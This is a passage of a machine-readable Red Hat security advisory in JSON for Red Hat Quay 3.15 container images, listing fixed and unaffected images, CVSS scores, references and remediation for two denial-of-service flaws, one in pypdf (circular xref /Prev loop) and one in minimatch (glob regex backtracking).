"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442543"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in pypdf. Processing a specially crafted PDF document, specifically with circular /Prev references in the cross-reference (xref) chain, can cause an infinite loop and a high consumption of CPU, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pypdf: possible infinite loop when loading circular /Prev entries in cross-reference streams",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to supply a crafted PDF file to be processed by an application using the pypdf library. This issue can cause the application to enter an infinite loop and consume a high amount of CPU resources, eventually resulting in a denial of service with no other security impact. Due to these reasons, this vulnerability has been rated with a moderate impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27628"
},
{
"category": "external",
"summary": "RHBZ#2442543",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442543"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27628",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27628"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27628",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27628"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/commit/0fbd95938724ad2d72688d4112207c0590f0483f",
"url": "https://github.com/py-pdf/pypdf/commit/0fbd95938724ad2d72688d4112207c0590f0483f"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/issues/3654",
"url": "https://github.com/py-pdf/pypdf/issues/3654"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-2rw7-x74f-jg35",
"url": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-2rw7-x74f-jg35"
}
],
"release_date": "2026-02-25T02:45:37.543000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "pypdf: possible infinite loop when loading circular /Prev entries in cross-reference streams"
},
{
"cve": "CVE-2026-27904",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-26T02:01:23.004531+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442922"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27904"
},
{
"category": "external",
"summary": "RHBZ#2442922",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442922"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27904",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27904"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74"
}
],
"release_date": "2026-02-26T01:07:42.693000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
